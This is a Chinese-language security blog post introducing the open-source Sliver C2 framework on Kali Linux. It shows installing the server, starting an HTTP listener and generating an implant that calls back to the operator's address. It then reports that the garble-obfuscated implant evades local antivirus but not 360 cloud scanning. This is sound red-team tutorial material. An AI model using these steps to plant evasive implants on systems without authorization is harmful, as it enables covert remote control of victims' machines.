渗透框架Sliver从入门到精髓

admin 2022年11月16日11:37:25安全文章评论38 views920字阅读3分4秒阅读模式

在前面的文章中,我们讲到了很多渗透框架如Empire CS Msfconsole等等。他们都有各自的优点和缺点,但是他们共同的缺点就是免杀不是很好。有没有一款工具,既能实现团队协作,又能做到很好的免杀呢?

关于Sliver C2

Sliver 是一个基于Go的开源、跨平台的红队平台,可供各种规模的组织用于执行安全测试。Sliver 的支持 C2 over Mutual-TLSHTTP(S) 和 DNS等协议。implant可以时时编译生成,并会使用证书进行加密。服务器和客户端以及implant都支持MacOSWindowsLinux。如何在Kali Linux服务器上安装BishopFox的Sliver C2框架呢?

在kali中安装

源码安装

curl https://sliver.sh/install|sudo bash

渗透框架Sliver从入门到精髓

可能由于网络等因素,下载比较慢。我们可以访问下面页面,直接下载编译好的。

https://github.com/BishopFox/sliver/releases

下载Linux服务器端

渗透框架Sliver从入门到精髓

运行

sliver运行需要配置一些环境变量,如gogcc,方便生成木马时候进行编译,在kali下运行十分简单,因为kali已经内置了这些变量。只需执行命令sliver-server_linux即可。

渗透框架Sliver从入门到精髓

快速上手

配置一个基于http的监听

http -l 8888

渗透框架Sliver从入门到精髓

生成一个基于http的c2 shell

generate --http http://192.168.123.23:8888

sliver之前的版本使用的gobfuscate,在源码层面修改变量以及代码结构,速度比较慢,相比之下garble是对中间编译环节进行混淆结构,速度比较快也能混淆大部分符号等信息。当然免杀效果也肯定很好。当然生成的文件也比较大约为17M

渗透框架Sliver从入门到精髓运行生成的exe文件,成功得到会话。

渗透框架Sliver从入门到精髓

渗透框架Sliver从入门到精髓

进入当前会话

use id
渗透框架Sliver从入门到精髓
渗透框架Sliver从入门到精髓

免杀测试

渗透框架Sliver从入门到精髓

渗透框架Sliver从入门到精髓

需要注意,360云查杀可以扫描出来。本地杀毒没有问题。至于云查杀,我们在后面的在做谈论。

其他

sliver的其他玩法,我们会在后面的文章中继续更新。感兴趣的小伙伴们点赞收藏吧。

更多精彩文章 欢迎关注我们


原文始发于微信公众号(kali黑客笔记):渗透框架Sliver从入门到精髓

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月16日11:37:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  渗透框架Sliver从入门到精髓 http://cn-sec.com/archives/1412541.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: